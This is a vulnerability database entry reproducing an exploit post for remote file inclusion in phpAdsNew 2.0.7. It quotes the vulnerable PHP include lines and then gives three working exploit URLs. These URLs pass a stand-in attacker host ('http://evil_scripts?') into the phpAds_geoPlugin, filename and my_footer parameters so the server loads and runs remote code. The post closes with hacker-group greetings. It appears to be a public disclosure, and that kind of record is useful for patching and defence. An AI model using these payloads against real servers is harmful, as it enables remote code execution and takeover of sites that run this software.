phpAdsNew 2.0.7 Remote File Include

2007-01-24T00:00:00
ID SECURITYVULNS:DOC:15800
Type securityvulns
Reporter Securityvulns
Modified 2007-01-24T00:00:00

Description


phpAdsNew 2.0.7 Remote File Include


Author: Alk()mand()z


Vuln Code:

include_once ($phpAds_geoPlugin);

.......................

function phpAds_ReportGetPluginInfo($filename) { include ($filename); return ($plugin_info_function()); ..........................

include ($phpAds_config['my_footer']);


3xplo!t:

phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts?

phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?

phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts?


download: http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team

                                                ###################################################

       AsB-MaT.NeT & D4eG.OrG
                                          ###################################################

--


Get your free email from http://www.hackermail.com